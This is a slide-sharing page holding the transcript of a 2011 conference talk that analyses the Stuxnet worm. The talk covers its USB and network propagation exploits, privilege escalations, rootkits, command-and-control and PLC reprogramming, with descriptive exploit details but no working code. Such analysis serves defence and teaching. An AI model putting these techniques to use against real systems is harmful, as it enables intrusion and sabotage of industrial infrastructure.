1 / 38

Tomer Teller , DC9723, 18/1/11

Tomer Teller , DC9723, 18/1/11. Stuxnet: How to take over a (nuclear) power plant. Who Am I ?. A Black Hat gone good (courier -> cracker) Security Evangelist at Check Point Specialize in network hacking & reversing Finished all levels of Angry Birds (3 stars!). Why are we here ?.

lesa
Download Presentation

Tomer Teller , DC9723, 18/1/11

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Tomer Teller , DC9723, 18/1/11 Stuxnet: How to take over a (nuclear) power plant

  2. Who Am I ? • A Black Hat gone good (courier -> cracker) • Security Evangelist at Check Point • Specialize in network hacking & reversing • Finished all levels of Angry Birds (3 stars!)

  3. Why are we here ? • We like Malware • Stuxnet is a Malware! • Iran is involved • Microsoft got pwn'd • Learn new techniques • See some DEMO’s (hopefully)

  4. Terminology • SCADA/ICS - stands for Supervisory Control and Data Acquisition. It generally refers to Industrial Control Systems (ICS): computer systems that monitor and control industrial, infrastructure, or facility-based processes. • PLC - A Programmable Logic Controller (PLC) – Control of machinery on factory assembly lines. • Field PG - used to program PLCs. • Wincc/Step7–SIEMENS application used to program PLC (IDE/Compiler) and is installed on a Field PG.

  5. Threat Overview • Architecture • Single DLL • Resource containing payloads • Component based • Exploits • 4 un-disclosed vulns! • Techniques • “cunning” hack • LoadLibrary() maneuver

  6. Statistics This is not normal… ref: Symantec dossier paper

  7. Welcome to the Battle Field

  8. What’s going to happen? Here

  9. What’s going to happen? Nuclear Reactor Gas pipeline Water Pipe

  10. Mission Objectives Introduce Threat to Target Propagate inside the network Infect Field PG machines GOAL: Reprogram ICS machines

  11. The First Infection • An Insider • A Contractor • A Scada Confrence USB Give-away • Super Sheep over the fence

  12. Removable Drive Propagation Okay, now what ? • LNK auto-execution (MS10-046) • Autorun.inf Technique

  13. LNK Auto-Execution (MS10-046) • Design-Level flaw when parsing LNK files (i.e. shortcut file) • File format can store links to control panel applet (CPL) DLL • Vulnerable code processes these links like it processes icons. • Problem: System does not check if the DLL is in SYSTEM32 or part of a white list (registered) • The Result: Arbitrary DLLs can be loaded via a shortcut.

  14. LNK Binary Format (DIY) Control Items OffsetSizeField 0x0000 2 itemIDSize0x0002 2 wDummy . . . 0x0018 n Path LNK Binary Format OffsetSizeField 0x0000 4 HeaderSize 0x0004 16 LinkCLSID 0x0014 4 LinkFlags (optional structure) . . 0x0042 4 (reserved)

  15. Autorun.inf Technique • We all know AutoRun.inf File & Dialog • The code that parses that file is very “flexible” • How flexible ?

  16. Autorun.inf Technique cont. EXE AutoRun

  17. The LoadLibrary() Technique • Whenever stuxnet needs to load a DLL (including itself), it uses a special method to bypass anti-virus behavior blocking detection. • Stuxnet calls LoadLibrary() with a special crafted name that does not exist and causes LoadLibrary() to fail. • NTdll.dll was hooked to monitor for request to load specially crafted file names • These filename are mapped to a different location – specified by Stuxenet. • File name example: KERNEL32.DLL.ASLR.[ADDRESS]

  18. User/Kernel Space rootkits • User Space Rootkit • Hide files by hooking Kernel32 & NTDLL • FindFirstFileW ,FindNextFileW • NTQueryDirectoryFile, ZwQueryDirectoryFile • Kernel Space Rootkit • Register a device driver (MrxNet.sys) to intercept I/O Request Packets (IRP) • Monitor Directory Control & Query (read/write) • Detect & Infect Removable Devices

  19. Compromised Certificates • Driver was digitally signed by a legitimate certificate that is trusted by Windows. • Both companies seem to have offices in the Hsinchu Science and Industrial Park (Taiwan)

  20. No Admin?! No Problem! (Vista+ Style) • Privilege Escalation in Task Scheduler.20-11-2010www.exploit-db.com/exploits/15589 • Task file’s is hashed by CRC32 • Modify the original task to run under localSystem • Fix the CRC checksum by “padding”<-Collision

  21. No Admin?! No Problem! (XP Style) Copy bad code to that address. Change layout to point at index #5 Load the keyboard layout • Privilege Escalation in Keyboard Layout (MS10-073) • Keyboard layout can be loaded from any where in the system • Out of bound index into an array of function pointers in win32k.sys cf12fa38  cf933423 win32k!KbdNlsFuncTypeDummy [index 0]cf12fa3c  cf93342e win32k!KbdNlsFuncTypeNormal [index 1]cf12fa40  cf933474 win32k!KbdNlsFuncTypeAlt [index 2]cf12fa44  ff496867 [index 3]cf12fa48  ff466564 [index 4]cf12fa4c  60636261<- user space address [index 5]cf12fa50  0000006e .

  22. Demo(s) Time • Autorun.inf • LNK vulnerability (MS10-046) • User Space RootKit (source available)

  23. Mission #1 Completed Here

  24. Recap Introduce Threat to Target Propagate inside the network Infect Field PG machines GOAL: Reprogram ICS machines

  25. MS08-067 – Server Service Vulnerability Search For ‘\’ Search For ‘\’ Search For ‘\’ Search For ‘\’ NetprPathCanonicalize() \share\path1\path2/../../../../buff \share\path1/../../../buff \share/../../buff /../buff • SRVSVC is an RPC interface which controls shares and files. • Binding to this interface via SMB and calling one of its functions -- NetprPathCanonicalize() with a malformed path string: • e.g. /<name>/../../<rest of string> • Results in a buffer overflow • Successful exploitation can lead to code execution with System level privileges. Buffer Overflow

  26. MS10-061 – Printer Spooler Vulnerability • Released in 2009 in a hacker magazine • Allows a file to be written to the %System% folder by printing a document into a file. • Stuxnet “prints” 2 files • A Managed object format (MOF) file – use for windows events • The Stuxnet worm itself • Once the MOF file is detected by the OS in a specific directory (C:\windows\system\wbem\mof\<file>) • Executes the event which is to run the executable file.

  27. Network Shares Infection • Stuxnet enumerates all users accounts of the computer and the domain • Try all available network resources • Using the user credential • Drop Stuxnet Executable on the remote share • Schedule a network job to run 2 min after NetScheduleJobAdd()

  28. P2P Communication Component • Stuxnet installs an RPC Client / Server. • Compromised computers can connect and ask for the latest version Infected machine acting as Server Infected machine acting as Client RPC Server Routines:0: Return Current Ver1: Inject & Execute2: Load module3: Inject to lsass.exe4: Send Current Version 5: Create Process 6: Read File Get Version (0) Send Version Request Update (4) Send Update ref: Symantec dossier paper

  29. Command & Control Component • Stuxnet communicates back using an HTTP C&C backdoor and encrypted data. Command And Control Server Infected Machine GET www.msn.com 200 OK GET Index.php?data=[encrypted] Command X Command Y ref: Symantec dossier paper

  30. Alive Mission #2 Completed Ping Here

  31. Recap Introduce Threat to Target Propagate inside the network Infect Field PG machines GOAL: Reprogram ICS machines

  32. PLC RootKit • On the Field PG, Stuxnet will look for: • Specific version STEP7/WinCC • Specific Network card • Specific PLC model & version connected • Stuxnet will replace a DLL file that is in-charge of communicating with the PLC on the Field PG. • After replacement Stuxnet will be able to: • Monitor PLC commands being written to and read from • Infect a PLC by inserting bad commands • Mask the fact the PLC is infected

  33. Infected PLC Example (READ/WRITE) Step7/WinCC Original DLL New DLL PLC ? ? ? Read() Read() Modified Data 500 5 500 Original Data Data New DLL Original DLL Field GP 5 5 500 Write() Write() Modified Data 5 5 500 Wrote Data

  34. Recap Introduce Threat to Target Propagate inside the network Infect Field PG machines GOAL: Reprogram ICS machines

  35. Mission Accomplished

  36. Who’s Behind It ? • Some say Israel: • b:\myrtus\src\objfre_w2k_x86\i386 \guava.pdb • myrtus -> myrtle -> Hadassah -> Queen Esther • My-RTUs -> Remote Terminal Unit -> Control SCADA Systems • 0x19790509 • May 09, 1979. That date coincides with the Iranian's execution of Habib Elghanian, a prominent Jewish businessman in Iran • Some say Germany • Some say USA

  37. Questions ?

  38. kthxbye Tomer Teller tomert@checkpoint.com

More Related